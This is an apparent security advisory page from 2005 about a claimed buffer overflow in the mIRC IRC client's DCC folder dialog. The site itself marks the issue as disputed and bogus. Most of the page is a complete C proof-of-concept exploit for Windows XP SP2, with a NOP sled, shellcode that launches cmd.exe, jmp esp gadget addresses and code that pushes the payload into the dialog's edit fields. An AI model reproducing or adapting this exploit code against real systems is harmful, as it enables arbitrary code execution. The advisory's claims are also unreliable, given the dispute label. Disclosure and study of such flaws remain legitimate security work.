WARNING! Fake news / Disputed / BOGUS

mIRC buffer overflow

2005.12.22
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 4.6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

- 1 - Introduction Written by Khaled Mardam-Bey, mIRC is a friendly IRC client that is well equipped with options and tools. - 2 - Vulnerability description Tested on mIRC 6.16,6.12,6.03 and 5.91, all result vulnerable. Possibly all mIRC versions are vulnerable. The code executed are with current user privileges,anyway this bug could be dangerous in universities, cyber coffees, schools and any location with restrictions. Adding/editing filters to locate the specified folder for the files transfered by DCC if insert a string greater or equal to 981 bytes the application crash showing an memory error 0x0000. This 0x0000 error it's because shows the value of the second edit field and it's empty, if write AAAA in this field, the error it's 0x41414141, overwrite the eip and can take the control to execute arbitrary code. To execute code appears a little problem, only can write 39chars in the second edit, this problem imposibilite insert a good shellcode, to fix this, can put jmp esp + sub esp 0x74 + jmp esp, with this, the EIP it's overwrited by the text in the first edit field, and in this have 980bytes for the shellcode. - 3 - How to exploit it This PoC open a cmd.exe,also it's possible execute any other code. ----------- CUT HERE ---------------------- /* mIRCexploitXPSP2eng.c Vulnerability tested on Windows XP SP1,SP2 Spanish and Windows XP SP2 English This PoC it's for XP SP2 English, for spanish readers: XP SP1 system: 0x77bf8044 jmp esp: 0x77E29BBB (advapi32.dll) XP SP2 system: 0x77bf93c7 jmp esp: 0x77E37BBB (advapi32.dll) Special thanks to rojodos (very great your tutorial), jocanor, otromasf, crazyking and gandalfj. */ #include <stdio.h> #include <stdlib.h> #include <windows.h> int main () { HWND lHandle, lHandledit, lHandledit2; char strClass[30]; char shellcode[999]= "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x55" "\x8B\xEC" "\x33\xFF" "\x57" "\x83\xEC\x04" "\xC6\x45\xF8\x63" "\xC6\x45\xF9\x6D" "\xC6\x45\xFA\x64" "\xC6\x45\xFB\x2E" "\xC6\x45\xFC\x65" "\xC6\x45\xFD\x78" "\xC6\x45\xFE\x65" "\x8D\x45\xF8" "\x50" "\xBB\xc7\x93\xc2\x77" "\xFF\xD3" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; //Shellcode system("cmd.exe"), system in \xc7\x93\xc2\x77 77c293c7 (WinXP Sp2 English) char saltaoffset[]="\xD6\xD1\xE5\x77\x90\x90\x90\x90\x90\x83\xEC\x74\xFF\xE4\x90\x90"; // jmp esp 0x77E5D1D6 (advapi32.dll) , sub esp 0x74, jmp esp lHandle=FindWindow(NULL, "DCC Get Folder"); if (!lHandle) { printf("\nCan't find mIRC DCC Get Folder Dialog :\nIn mIRC Options/DCC/Folders push ADD\n"); return 0; } else { printf("handle for mIRC DCC Get Folder Dialog : 0x%X\n",lHandle); } SetForegroundWindow(lHandle); lHandledit = FindWindowEx(lHandle, 0, "Edit", 0); printf("handle for First Edit : 0x%X\n",lHandledit); printf("ASCII Shellcode in first edit : %s\n", shellcode); SendMessage(lHandledit, WM_SETTEXT,0,(LPARAM)shellcode); lHandledit2 = GetWindow(lHandledit, GW_HWNDNEXT); GetClassName(lHandledit2, strClass, sizeof(strClass)); while ( lstrcmp(strClass,"Edit") ) { lHandledit2 = GetWindow(lHandledit2, GW_HWNDNEXT); GetClassName(lHandledit2, strClass, sizeof(strClass)); } printf("handle for Second Edit : 0x%X\n",lHandledit2); Sleep(500); printf("ASCII Shellcode in second edit : %s\n", saltaoffset); SendMessage(lHandledit2, WM_SETTEXT,0,(LPARAM)saltaoffset); Sleep(500); SendMessage (lHandledit2, WM_IME_KEYDOWN, VK_RETURN, 0); } ----------- CUT HERE ---------------------- - 4 - Solution I contacted with khaled in khaled@mirc.com reporting the bug on 29/11/2005 without response. Contacting again with this advisory. - 5 - Credits URL Vendor: www.mirc.com Author: Jordi Corrales ( crowdat[at]gmail.com ) Date: 09/12/2005 Spanish and English Advisory: http://www.shellsec.net/leer_advisory.php?id=9 Spanish Advisory and Compiled Spanish Exploit: http://www.cyruxnet.org/mirc616_bug_exploit.htm


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top